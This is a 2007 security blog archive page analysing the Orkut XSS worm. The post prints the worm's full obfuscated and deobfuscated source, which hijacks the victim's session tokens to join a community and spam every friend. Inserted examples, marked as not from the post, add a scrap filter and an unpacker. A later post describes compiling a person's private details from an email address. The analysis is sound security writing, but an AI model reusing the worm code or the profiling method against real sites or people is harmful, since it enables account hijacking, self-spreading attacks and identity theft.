Wednesday, December 19, 2007

Orkut/Google worm compromises over 400,000 accounts

Also posted to the Trend Micro blog (without the code samples at the end)


There appears to be a web worm which has replicated at an alarming rate through Google’s Orkut social network in the last few hours.
Infection starts when the user is sent an email telling them that they have a new Scrapbook entry (essentially a guestbook). Upon visiting their page the user sees the text:

“2008 vem ai… que ele comece mto bem para vc”

No interaction is necessary; simply viewing the scrap starts the infection sequence. The scrap deletes itself and the user is added to the Orkut community “Infectados pelo Vírus do Orkut”. It then downloads and executes a heavily obfuscated JavaScript from http://files.myopera.com/virusdoorkut/files/virus.js, which in turn sends a copy of the original Scrapbook post to all of the user's Orkut contacts, so that they too will be infected by the threat.

At last count the group had over 400,000 infected users. A Google translation of the group's description reads:

“CALMA!
If you came into this community, make sure that no data was stolen and not your will, that is not my goal.
If I are sure at the end of all, this community should is lotada of people.
This just to show how orkut may be dangerous, you came up here without clicking absolutely no link malicious, everything was done reading scraps.”

It appears from both the script we have analysed and this description that the script was designed purely to spread, rather than for the more malicious purposes normally associated with this type of attack. The author has since pulled the malicious JavaScript from the web, having apparently got his point across. The attack works because Orkut allows users to embed Flash content in their scrap posts (although it does filter for normal XSS techniques).

The author appears to have created a SWFObject that calls the malicious JavaScript and was able to use this to bypass Orkut's filters. This is not the first time a worm like this has targeted a social network: MySpace fell victim to the infamous “Samy Is My Hero” XSS worm released in 2005. Luckily for the almost half a million users affected, this was purely a proof of concept. The possible implications of a more malicious attack in the future, however, are much more worrying.
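The filtering gap described above, as an added example that is not Orkut's code: a blocklist that strips <script> blocks and inline event handlers still lets an <embed> through, whereas an allowlist of plain formatting tags does not. The allowed tag set, the sample scrap and the placeholder SWF URL are constructed for illustration.

```javascript
// Added example (not Orkut's code): blocklist vs allowlist filtering of scrap HTML.
// Tag names, the sample scrap and the placeholder URL below are constructed.

// Blocklist approach, in the spirit of "filter for normal XSS techniques":
// removes <script> blocks and inline on* handlers, passes everything else through.
function blocklistFilter(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "")
    .replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, "");
}

// Allowlist approach: keep only a fixed set of harmless formatting tags, with no
// attributes at all; every other tag (embed, object, iframe, script, ...) is dropped.
const ALLOWED_TAGS = new Set(["b", "i", "u", "br"]);
function allowlistFilter(html) {
  return html.replace(/<\/?([a-z][a-z0-9]*)\b[^>]*>/gi, (tag, name) => {
    const lower = name.toLowerCase();
    if (!ALLOWED_TAGS.has(lower)) return "";
    const closing = tag.charAt(1) === "/";
    return (closing ? "</" : "<") + lower + ">";
  });
}

// Detection helper: does the filtered scrap still carry a plugin container?
function containsActiveContent(html) {
  return /<(embed|object|applet|iframe)\b/i.test(html) ||
         /application\/x-shockwave-flash/i.test(html);
}

// Constructed scrap modelled on the worm's: a harmless greeting plus an invisible
// Flash embed. The SWF URL is a placeholder, not the real loader.
const SAMPLE_SCRAP =
  '2008 vem ai... que ele comece mto bem para vc<br/>' +
  '<embed src="http://example.invalid/loader.swf" ' +
  'type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">';

function demo() {
  return {
    blocklistLeaksFlash: containsActiveContent(blocklistFilter(SAMPLE_SCRAP)),
    allowlistLeaksFlash: containsActiveContent(allowlistFilter(SAMPLE_SCRAP)),
    allowlistOutput: allowlistFilter(SAMPLE_SCRAP),
  };
}
```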

APPENDIX (Code Details):

ORIGINAL OBFUSCATED CODE:

// Dean Edwards' p,a,c,k,e,r unpacker stub; the packed payload string and its '|'-separated word list follow as arguments.
function $(p,a,c,k,e,d) {
    e=function(c) {
        return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
    };
    if(!''.replace(/^/,String)){
        while(c--){d[e(c)]=k[c]||e(c)}
        k=[function(e){return d[e]}];
        e=function(){return'\\w+'};
        c=1
    };
    while(c--){
        if(k[c]){
            p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
    }
    return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\');r.1o=" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"
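Added example (not from the post): a static unpacker for the p,a,c,k,e,d format above, so a packed payload can be read without ever being executed. The miniature packed sample and word list are constructed; the same unpack() accepts the first four arguments of the real payload.

```javascript
// Added example (not from the post): static unpacker for the p,a,c,k,e,d packer.
// The packer swaps every identifier in the source for its base-`a` index into the
// word list `k`; this reverses that substitution with plain string operations.

// Mirrors the packer's e(): digits 0-9, then a-z, then A-Z (radix up to 62).
function encodeIndex(c, radix) {
  const d = c % radix;
  const digit = d > 35 ? String.fromCharCode(d + 29) : d.toString(36);
  return (c < radix ? "" : encodeIndex(Math.floor(c / radix), radix)) + digit;
}

// Inverse of encodeIndex: "1q" -> 88 for radix 62.
function decodeIndex(token, radix) {
  let n = 0;
  for (const ch of token) {
    const code = ch.charCodeAt(0);
    const v = code <= 57 ? code - 48        // '0'-'9'
            : code >= 97 ? code - 87        // 'a'-'z'
            : code - 29;                    // 'A'-'Z'
    n = n * radix + v;
  }
  return n;
}

// p, a, c, k are the four leading packer arguments (k still joined by '|').
// Every alphanumeric token that maps to a non-empty dictionary entry is replaced;
// empty entries are how the packer protects literals such as "0" from substitution.
function unpack(p, a, c, k) {
  const words = k.split("|");
  return p.replace(/\b[0-9a-zA-Z]+\b/g, (tok) => {
    const i = decodeIndex(tok, a);
    return i < c && words[i] ? words[i] : tok;
  });
}

// Constructed miniature in the same format (not the worm's payload): slots 0 and 1
// are empty so the literal "0" in the source survives unchanged.
const SAMPLE_P = "2 3=0;4 5(6){7 8.9}";
const SAMPLE_K = "||var|index|function|getCookie|name|return|document|cookie";
function unpackSample() {
  return unpack(SAMPLE_P, 62, 10, SAMPLE_K);
}
```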

DEOBFUSCATED CODE


var index=0;

// Anti-CSRF token and page signature that Orkut embeds in every page; the worm reuses them for its own requests.
var POST=JSHDF["CGI.POST_TOKEN"];
var SIG=JSHDF["Page.signature.raw"];

// Cross-browser XMLHttpRequest factory: IE ActiveX variants first, then the native object.
function createXMLHttpRequest(){
    try { return new ActiveXObject("Msxml2.XMLHTTP") } catch(e){};
    try { return new ActiveXObject("Microsoft.XMLHTTP") } catch(e){};
    try { return new XMLHttpRequest() } catch(e){};
    return null
};

function setCookie(name,value,expires,path,domain,secure){
    var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");
    document.cookie=curCookie
};

function getCookie(name){
    var dc=document.cookie;
    var prefix=name+"=";
    var begin=dc.indexOf(";"+prefix);
    if(begin==-1){
        begin=dc.indexOf(prefix);
        if(begin!=0){
            return false
        }
    } else {
        begin+=2
    };
    var end=document.cookie.indexOf(";",begin);
    if(end==-1){
        end=dc.length
    };
    return unescape(dc.substring(begin+prefix.length,end))
};

// Present in the script but never called.
function deleteCookie(name,path,domain){
    if(getCookie(name)){
        document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 01-Jan-70 00:00:01 GMT";
        history.go(0)
    }
};

// Step 2: fetch the Compose page, lift the victim's friend <select> list out of it, then start sending scraps.
function loadFriends(){
    var xml=createXMLHttpRequest();
    if(xml){
        xml.open("GET","http://www.orkut.com/Compose.aspx",true);
        xml.send(null);
        xml.onreadystatechange=function(){
            if(xml.readyState==4){
                if(xml.status==200){
                    var xmlr=xml.responseText;
                    var div=document.createElement("div");
                    div.innerHTML=xmlr;
                    var select=div.getElementsByTagName("select").item(0);
                    if(select){
                        select.removeChild(select.getElementsByTagName("option").item(0));
                        select.setAttribute("id","selectedList");
                        select.style.display="none";
                        document.body.appendChild(select);
                        sendScrap()
                    }
                } else {
                    loadFriends()
                }
            }
        };
        xml.send(null) // send() is called a second time in the script as recovered
    }
};

// Step 1: join the Orkut community (id 44001818) with the victim's own token, retrying until it succeeds.
function cmm_join(){
    var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";
    var xml=createXMLHttpRequest();
    xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);
    xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    xml.send(send);
    xml.onreadystatechange=function(){
        if(xml.readyState==4){
            if(xml.status!=200){
                cmm_join();
                return
            };
            loadFriends()
        }
    }
};

// Step 3: post the scrap to each friend in turn, tracking progress in a cookie so a reload resumes where it left off.
function sendScrap(){
    if(index==document.getElementById("selectedList").length){
        return
    };
    var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";
    var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;
    var xml=createXMLHttpRequest();
    xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);
    xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
    xml.send(send);
    xml.onreadystatechange=function(){
        if(xml.readyState==4){
            index++;
            var wDate=new Date;
            wDate.setTime(wDate.getTime()+86400);
            setCookie('wormdoorkut',index,wDate);
            sendScrap()
        }
    }
};

// Entry point: initialise the progress cookie if it is absent, then kick off the chain.
if(!getCookie('wormdoorkut')){
    var wDate=new Date;
    wDate.setTime(wDate.getTime()+86400);
    setCookie('wormdoorkut','0',wDate)
};

index=getCookie('wormdoorkut');
cmm_join();


Tuesday, December 18, 2007

Identity Theft made easy

Now up on Trend Micro with a few alterations

In today's world of social networking sites, finding enough information to impersonate someone is trivial. The only difficult part of the process is tracking down an individual from, say, their email address to their profile on a MySpace or Bebo page. With the new OpenSocial initiative, this has become a lot easier to do.

Sites such as Spokeo, Spock and a whole host of others will gladly trawl all available OpenSocial social networks if supplied with the email address of a "friend". The full list of services covered depends on the site, but a full list of the services provided by Spokeo is available here. This stuff is a dream come true for identity thieves.

Let's take an example. I decided to use my own email address and see what I could find out about myself. It should be noted that I do not take part in a lot of online social networking, so in most cases a search would yield more results than this. I also deliberately set my status to public on the networks that I do frequent for the purposes of the experiment, as these services (luckily) will not trawl private pages.

The search showed up my Bebo account, Picasa account, this blog, my Amazon wish list and all the entries I have made on Digg.com. Note that OpenSocial does not include Facebook, so that did not show up. I have been careful to keep personal data off the web, but had completely forgotten about the Picasa and Amazon pages.

For added effect I decided to pick one of my friends at random and, using just their email address, find out as much about them as possible. Obviously I won't call out the exact details, but here's a taster:

Name, address, date of birth, photos, family members, place of work plus full education and work history, phone number, likes and dislikes, pets, and a whole pile more.

Consider that most banks ask for less information than that when changing account details, and you begin to get an idea of how big an issue this is.


Friday, December 14, 2007

Mobiles as Modems

I was reading the following story over on the Beeb (http://news.bbc.co.uk/2/hi/americas/7141935.stm) and, while I initially sympathised with the guy, thinking it was some sort of crazy decimal point error on the part of the mobile phone network provider, it turns out he is just an idiot who ran up over 80K using his mobile as a modem.

I have recently come into possession of the very spiffy Nokia N95-2 8GB and have been thoroughly impressed so far. Add to this that my service provider has introduced a new 99c for 50Mb daily flat rate, and internet over mobile is fast becoming a reality for me.
Add to this the fact that the N95 doubles as the following, and you can start to tell why I am so impressed with it:

- 8Gb MP3 Player
- Portable Movie Player
- Internet browser (WiFi + 3G)
- 5Mb Camera/Camcorder
- N-Gage handheld games machine
- Personal Organiser

Oh, and they threw a phone in for good measure. I intend to do a proper review in about a month, after I have had time to really use it, but for now it's one hell of a Christmas pressie :)

Tuesday, December 4, 2007

History of .com

Today I came across some work carried out by http://thelongestlistofthelongeststuffatthelongestdomainnameatlonglast.com which details the first 100 .com sites registered, the first being www.symbolics.com, registered back on March 15th, 1985. Needless to say this list has already been added to the Wikipedia article. Some of the 100 I have never heard of, while others are household names (Xerox, HP, IBM, etc.).

It is interesting to note that there are no security vendors or porn sites on the list. I guess the web was a nicer place back in 1987 (the infamous Morris Worm did not hit until 1988). Microsoft doesn't make the cut either, having only jumped on the bandwagon on the 2nd of May 1991, almost 3 years before Playboy.com realised the potential of the new communication medium.

If you are interested to see when other domains were registered, pop over to network-tools.com and run a Whois search. An easy way to kill a few minutes at work :)
